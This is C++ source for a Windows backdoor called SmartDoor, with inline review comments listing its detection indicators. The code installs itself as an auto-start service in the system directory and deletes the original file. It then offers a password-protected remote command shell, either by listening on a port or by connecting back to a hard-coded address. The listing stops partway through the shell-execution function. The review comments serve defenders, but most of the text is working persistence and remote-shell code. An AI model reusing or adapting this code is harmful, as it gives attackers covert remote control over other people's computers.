// SmartDoor.cpp : 定义 DLL 应用程序的入口点。
//http://www.dream2fly.net/
//源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^
#include "stdafx.h"
#include "SDdllw.h"
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#include <string>
using namespace::std;
#include <Shellapi.h>
#include <winsock2.h>
#include <urlmon.h>
#pragma comment (lib,"ws2_32")
#pragma comment (lib, "urlmon.lib")
void LogToFile(const char * , int nErrNo = 0) ; // Appends a message plus an optional Win32 error code to a log file (body not in this chunk)
#define MAXLINK 5 // listen() backlog used by ShellServer
#define PASSWORD "dream2fly" // Static credential; presumably consumed by Passport(), whose body is not in this chunk
u_short g_nPort = 12345; // TCP port ShellServer binds; the EXE build overrides it from argv[1] in WinMain
// When _REVERSE is defined, ServiceMain loops on ConnectClient() instead of running ShellServer()
//#define _REVERSE 1
#define BUFLEN 65535 // Size of the per-connection buffer declared in ExeCmdShell
bool Passport(SOCKET *csock);
void ConnectClient();
void ShellServer();
// Per-connection command execution thread (CreateThread entry point)
DWORD WINAPI ExeCmdShell(LPVOID lp);
// NOTE(review): SERVICENAME, PASSWORD, the reverse-connect peer in ConnectClient and the rundll32
// command line built in InstallService are fixed literals in this sample; together with g_nPort
// (only overridable on the EXE command line) they are the static indicators a detection rule can key on.
#define SERVICENAME "Remote Command Server"
#define SERVICEDISPLAYNAME SERVICENAME
SC_HANDLE scm,svc; // SCM and service handles used by InstallService
SERVICE_STATUS ServiceStatus; // Shared status record written by ServiceMain, ServiceCtrlHandler and DeleteSvc
SERVICE_STATUS_HANDLE ServiceStatusHandle; // Set by RegisterServiceCtrlHandler in ServiceMain; zero until then
DWORD IsService( BOOL& ); // Defined elsewhere; InitService ignores the return value and branches on the BOOL it passes
int InitService(); // Also the export named in the rundll32 service command line (",InitService")
void InstallService();
int DeleteSvc();
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv);
void WINAPI ServiceCtrlHandler(DWORD dwControl);
#ifdef _MYEXE
// Program entry for the EXE build (_MYEXE): an optional first argument overrides the
// listening port, then control passes to InitService().
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
{
int nArg;
// NOTE(review): para is not checked for NULL before it is indexed.
LPWSTR *para = CommandLineToArgvW(::GetCommandLineW(),&nArg);
// Any argument present: argv[1] is parsed as the port. _wtoi yields 0 for non-numeric
// text, and the int result is narrowed to u_short without a range check.
if (nArg!=1)
{
g_nPort=_wtoi(para[1]);
}
LocalFree(para);
InitService();
return 0;
}
#else
// DLL entry for the DLL build: deliberately does nothing on attach/detach.
// The functional entry point is InitService(), which InstallService registers as the
// rundll32 export in the service command line.
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
// All four notifications fall through to the same no-op
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
#endif
// Entry point for both builds: called from WinMain (EXE) or via rundll32 (DLL).
// If the process is judged to be running as the service it hands control to the SCM
// dispatcher; otherwise, or if dispatching fails, it installs and starts the service.
// Always returns 0.
int InitService(void)
{
// Service dispatch table: one entry for SERVICENAME, terminated by a NULL pair
SERVICE_TABLE_ENTRY ServiceTableEntry[] = {
{ SERVICENAME, ServiceMain },
{ NULL, NULL } };
BOOL bService = TRUE;
// This process should be a service :)
// IsService is defined elsewhere; only the out-parameter is used. bService starts TRUE,
// so if IsService leaves it untouched the dispatcher path is taken.
IsService( bService );
if ( bService )
{ // Start service
LogToFile( "This process is service" , GetLastError() );
// StartServiceCtrlDispatcher typically fails when the process was not launched by the
// SCM (e.g. run from a console); that failure path also installs the service.
if (!StartServiceCtrlDispatcher(ServiceTableEntry))
{
LogToFile( "StartServiceCtrlDispatcher" , GetLastError() );
InstallService();
}
}
else// Not started as a service: install it
{
LogToFile( "This process is not service" , GetLastError() );
InstallService();
}
return 0;
}
//http://www.dream2fly.net/
//源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^
// Deletes service
// Unregisters SERVICENAME from the SCM and marks the shared ServiceStatus as stopped.
// Not referenced anywhere else in this chunk. Returns 0 on every path, so a caller
// cannot distinguish success from failure except through the log.
int DeleteSvc()
{
// Open service manager
SC_HANDLE hSCM = ::OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCM == NULL)
{
LogToFile( "DeleteSvc->OpenSCManager" ,GetLastError() );
return 0;
}
// OPen service
SC_HANDLE hService = ::OpenService( hSCM, SERVICENAME, SERVICE_ALL_ACCESS );
if (hService == NULL)
{
LogToFile( "DeleteSvc->OpenService" ,GetLastError() );
::CloseServiceHandle(hSCM);
return 0;
}
// Stopping the service first was disabled by the author; DeleteService is issued
// without a preceding SERVICE_CONTROL_STOP.
//SERVICE_STATUS status;
//if(!ControlService(hService, SERVICE_CONTROL_STOP, &status))
//{
// LogToFile( "DeleteSvc->ControlService", GetLastError() );
//}
// Deletes service from service database
// NOTE(review): this early return skips the two CloseServiceHandle calls below,
// leaving hService and hSCM open.
if (0 == DeleteService( hService ))
{
LogToFile( "DeleteSvc->DeleteService" ,GetLastError() );
return 0;
}
// Stop the service
// Reports STOPPED through the global handle registered in ServiceMain. If ServiceMain
// never ran, ServiceStatusHandle is still zero and SetServiceStatus fails (logged only).
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwServiceSpecificExitCode = 0;
if (!SetServiceStatus (ServiceStatusHandle, &ServiceStatus))
{
LogToFile( "DeleteSvc->SetServiceStatus", GetLastError() );
}
::CloseServiceHandle(hService);
::CloseServiceHandle(hSCM);
return 0;
}
// Converts a wide string to the current ANSI code page (GetACP()).
// Used by the DLL build of InstallService to turn argv[1] into a narrow path.
string WideToMutilByte(const wstring& _src)
{
int nLen = (int)_src.length();
// Output buffer: sizeof(wchar_t) bytes per input character, plus one
char *pszTemp = new char[sizeof(wchar_t)*(nLen + 1)];
int pos = WideCharToMultiByte(GetACP(), 0, _src.c_str(), nLen, pszTemp, sizeof(wchar_t)*(nLen + 1), 0, FALSE);
// NOTE(review): as listed, '/0' is a multi-character constant rather than a NUL byte,
// and pos is 0 (unchecked) when the conversion fails — confirm against the original
// source before relying on the terminator written here.
pszTemp[pos] = '/0';
// Copies up to the first NUL; the heap buffer is released before returning
string strRet(pszTemp);
delete []pszTemp;
return strRet;
}
// Installs this binary as an auto-start, interactive Windows service and starts it.
// EXE build: copies the running executable into the system directory.
// DLL build: expects argv[1] of the form "<dll>,InitService" (the same shape this
// function writes into the service command line), copies that DLL from the current
// directory into the system directory, and registers
// "<sysdir>\rundll32.exe <sysdir>\<dll>,InitService" as the service binary.
// In both builds the original file is deleted once its path differs from the copy.
// NOTE(review): from a detection standpoint the observable artefacts are the file copy
// into the system directory, a new SERVICE_AUTO_START service named SERVICENAME, and
// (DLL build) a rundll32 service command line ending in ",InitService".
void InstallService()
{
char szSysDir[MAX_PATH] = {0};
GetSystemDirectory(szSysDir,sizeof(szSysDir));
#ifdef _MYEXE
// Absolute path of the running process
char szExePath[MAX_PATH] = {0};
// Full path of this EXE
GetModuleFileName(NULL,szExePath,MAX_PATH);
// Walk back from the end to the last path separator to isolate the file name.
// NOTE(review): the separator appears as "//" throughout this listing; it is most likely
// a rendering artefact of the original single separator — confirm against the original.
char *ExeName=szExePath+strlen(szExePath);
for(;*ExeName!='//';ExeName--)
NULL;
ExeName++;
// Destination: <system dir>\<exe name>
char szServicPath[MAX_PATH];
memset(szServicPath,0,sizeof(szServicPath));
strcpy(szServicPath, szSysDir);
strcat(szServicPath,"//");
strcat(szServicPath,ExeName);
#else
char szCurDir[MAX_PATH] = {0};
GetCurrentDirectory(MAX_PATH-1,szCurDir);
TCHAR szExeFile[MAX_PATH] = {0};
int nArg;
// argv[1] is converted to the ANSI code page; neither para nor the converted length
// is checked before the _tcscpy into the MAX_PATH buffer.
LPWSTR *para = CommandLineToArgvW(::GetCommandLineW(),&nArg);
if (nArg!=1)
{
_tcscpy(szExeFile, WideToMutilByte(para[1]).c_str());
}
// The DLL file name is the text before the first ','. The scan has no bound and
// runs past the buffer when argv[1] contains no comma.
char *ExeNameEnd=szExeFile;
for(;*ExeNameEnd!=',';ExeNameEnd++)
NULL;
// Source: <current dir>\<dll>
char szExePath[MAX_PATH] = {0};
strcpy(szExePath, szCurDir);
strcat(szExePath,"//");
strncat(szExePath,szExeFile, ExeNameEnd - szExeFile);
// Destination: <system dir>\<dll>
char szServicPath[MAX_PATH] = {0};
strcpy(szServicPath, szSysDir);
strcat(szServicPath,"//");
strncat(szServicPath,szExeFile, ExeNameEnd - szExeFile);
#endif
#ifdef _DEBUG
// Debug builds run in place: no copy, and because the two paths then compare equal
// the DeleteFile below is skipped.
strcpy(szServicPath, szExePath);
#else
// CopyFile returns non-zero on success, 0 on failure; FALSE allows overwriting an
// existing destination. Direction: source --->> destination
if(!CopyFile(szExePath,szServicPath,FALSE))
{
LogToFile( "CopyFile" , GetLastError() );
}
#endif
// Remove the original whenever it lives at a different path (case-insensitive compare).
// This runs even if CopyFile failed above.
if(stricmp(szExePath, szServicPath))
{
DeleteFile(szExePath);
}
// Binary path handed to CreateService
char szDllStartPath[MAX_PATH] = {0};
#ifdef _MYEXE
// EXE build: the service binary path is szExePath
strcpy(szDllStartPath, szExePath);
#else
// "<system dir>\rundll32.exe <system dir>\<dll>,InitService"
strcpy(szDllStartPath, szSysDir);
strcat(szDllStartPath, "//rundll32.exe ");
strcat(szDllStartPath, szServicPath);
strcat(szDllStartPath, ",InitService");
#endif
// Register and start the service
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm==NULL)
{
LogToFile( "OpenSCManager" ,GetLastError() );
}
else
{
// Own-process, interactive, auto-start service; SERVICE_ERROR_IGNORE tells the SCM
// not to treat a startup failure as an error.
svc=::CreateService(scm,SERVICENAME,SERVICEDISPLAYNAME,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szDllStartPath,NULL,NULL,NULL,NULL,NULL);
// Freshly created or already present: reopen with SERVICE_START and start it.
// NOTE(review): a non-NULL handle returned by CreateService is overwritten on the
// OpenService line without being closed.
if (svc != NULL || GetLastError() == ERROR_SERVICE_EXISTS)
{
LogToFile( "OpenService..." , GetLastError() );
svc=::OpenService(scm,SERVICENAME,SERVICE_START);
if (svc == NULL)
{
LogToFile( "OpenService", GetLastError() );
}
else
{
if (!StartService(svc,0,NULL))
{
LogToFile( "StartService", GetLastError() );
}
}
}
else
{
LogToFile( "CreateService", GetLastError() );
}
// svc may be NULL here; CloseServiceHandle then simply fails
CloseServiceHandle(svc);
CloseServiceHandle(scm);
}
}
// Service control handler registered by ServiceMain.
// Only updates the shared ServiceStatus record and reports it back to the SCM. Nothing
// here signals ShellServer or ConnectClient, so as far as this chunk shows a STOP request
// changes the reported state but does not end the network loop.
void WINAPI ServiceCtrlHandler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
break;
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState=SERVICE_PAUSED;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
// Re-report the (possibly unchanged) status for every control code, including unknown ones
if (!SetServiceStatus (ServiceStatusHandle,&ServiceStatus))
{
LogToFile( "ServiceCtrlHandler->SetServiceStatus", GetLastError() );
}
return;
}
// Real service entry point, reached through the dispatch table in InitService.
// Registers the control handler, reports RUNNING, then runs the network side: with
// _REVERSE defined, ConnectClient() is retried every 100 ms forever; otherwise
// ShellServer() listens on g_nPort. argc/argv are unused.
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
ServiceStatus.dwServiceType=SERVICE_WIN32;
ServiceStatus.dwCurrentState=SERVICE_START_PENDING;
// STOP and PAUSE/CONTINUE are the controls ServiceCtrlHandler handles
ServiceStatus.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode=0;
ServiceStatus.dwWaitHint=0;
ServiceStatus.dwCheckPoint=0;
ServiceStatus.dwWin32ExitCode=0;
ServiceStatusHandle=RegisterServiceCtrlHandler(SERVICENAME,ServiceCtrlHandler);
if (ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
{
LogToFile( "ServiceMain->RegisterServiceCtrlHandler", GetLastError() );
return;
}
// One control handler per service
// Report running
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
ServiceStatus.dwWaitHint=0;
ServiceStatus.dwCheckPoint=0;
if (!SetServiceStatus (ServiceStatusHandle, &ServiceStatus))
{
LogToFile( "ServiceMain->SetServiceStatus", GetLastError() );
}
else
{
#ifdef _REVERSE
// Reverse mode: keep dialling out to the fixed peer in ConnectClient
while (1)
{
ConnectClient();
Sleep(100);
}
#else
// Bind mode: ShellServer's accept loop is unconditional, so this call does not return
ShellServer();
#endif
}
return ;
}
// Reverse-connect mode (compiled in only with _REVERSE): opens one TCP connection to the
// fixed peer below and, if it succeeds, serves a command shell on it via ExeCmdShell
// until that thread exits. Called repeatedly by ServiceMain.
// NOTE(review): the peer address and port are hard-coded literals — the primary network
// indicator for this mode of the sample.
void ConnectClient()
{
int ret;
WSADATA wsa;
// Winsock 2.2
ret=WSAStartup(0x0202,&wsa);
// NOTE(review): WSAStartup returns an error code, not a socket; comparing it with the
// INVALID_SOCKET sentinel means a failed startup is effectively not detected here.
if(ret==INVALID_SOCKET)
{
LogToFile( "WSAStartup " , GetLastError() );
// Any setup failure in this function terminates the whole (service host) process
exit(-1);
}
SOCKET ssock;
ssock=socket(AF_INET,SOCK_STREAM,0);
if(ssock==INVALID_SOCKET){
LogToFile( "socket " , GetLastError() );
exit(-1);
}
// SO_REUSEADDR: allow reuse of the local address and port
BOOL flag=TRUE;
ret=setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(char*)&flag,sizeof(flag));
if(ret==SOCKET_ERROR){
LogToFile( "setsockopt " , GetLastError() );
exit(-1);
}
struct sockaddr_in sin;
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
// Fixed peer (an RFC 1918 private address) and port: no name resolution, no configuration
sin.sin_addr.s_addr=inet_addr("192.168.2.22");
sin.sin_port=htons(666);
// Connect out to the peer: first argument is our socket, then the peer address and its length
if (connect(ssock, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
LogToFile( "connect" , GetLastError() );
}
else
{
// The shell thread receives a pointer to the local socket; the wait keeps it valid.
// NOTE(review): CreateThread's result is not checked, and the thread handle is never closed.
HANDLE h=CreateThread(NULL,0,ExeCmdShell,&ssock,0,0);
WaitForSingleObject(h,INFINITE);
}
closesocket(ssock);
WSACleanup();
}
// Bind mode: listens on all interfaces at g_nPort and serves one client at a time — each
// accepted connection is handed to ExeCmdShell on a new thread and the loop waits for that
// thread before accepting the next. The loop never exits, so the cleanup after it is
// unreachable.
// NOTE(review): a listening socket on g_nPort (12345 unless overridden) inside a service
// host process is the network indicator for this mode of the sample.
void ShellServer()
{
int ret;
WSADATA wsa;
// Winsock 2.2
ret=WSAStartup(0x0202,&wsa);
// Same check as in ConnectClient: an error code is compared with the socket sentinel,
// so a failed startup is effectively not detected
if(ret==INVALID_SOCKET)
{
LogToFile( "WSAStartup " , GetLastError() );
// Any setup failure in this function terminates the whole (service host) process
exit(-1);
}
SOCKET ssock;
ssock=socket(AF_INET,SOCK_STREAM,0);
if(ssock==INVALID_SOCKET){
LogToFile( "socket " , GetLastError() );
exit(-1);
}
// SO_REUSEADDR: allow reuse of the local address and port
BOOL flag=TRUE;
ret=setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(char*)&flag,sizeof(flag));
if(ret==SOCKET_ERROR){
LogToFile( "setsockopt " , GetLastError() );
exit(-1);
}
struct sockaddr_in sin;
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
// Bind to every local address on the configured port
sin.sin_addr.s_addr=htonl(ADDR_ANY);
sin.sin_port=htons(g_nPort);
ret=bind(ssock,(struct sockaddr*)&sin,sizeof(sin));
if(ret==SOCKET_ERROR){
LogToFile( "bind " , GetLastError() );
exit(-1);
}
// Backlog of MAXLINK pending connections; clients are still served strictly one after another
ret=listen(ssock,MAXLINK);
if(ret==SOCKET_ERROR)
{
LogToFile( "listen " , GetLastError() );
exit(-1);
}
while(1)
{
// csock: the connection accepted on ssock; the peer address is not recorded
SOCKET csock=accept(ssock,NULL,NULL);
if(csock==INVALID_SOCKET)
{
// Logged only: execution continues and the invalid socket is still handed to the thread below
LogToFile( "accept" , GetLastError() );
}
// Pointer to the loop-local csock; valid because the thread is waited on before the next iteration
HANDLE h=CreateThread(NULL,0,ExeCmdShell,&csock,0,0);
if(h!=NULL)
{
WaitForSingleObject(h,INFINITE);
closesocket(csock);
CloseHandle(h);
}
}
// Unreachable: the loop above has no exit
closesocket(ssock);
WSACleanup();
}
//ExeCmdShell: 建立两个管道,实现交互通信 .
DWORD WINAPI ExeCmdShell(LPVOID lp)
{
SOCKET *csock=(SOCKET*)lp;
char *exitok = "/r/n Exit OK! Bye byte!/r/n";
unsigned long lbyte;
char szBuf[BUFLEN]={0};
int ret;
//验证
if(Passport(csock)==false)
{
LogToFile( "Passport", GetLastError() );
closesocket(*csock);
return -1;
}
SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
STARTUPINFO si;
memset(&si,0,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;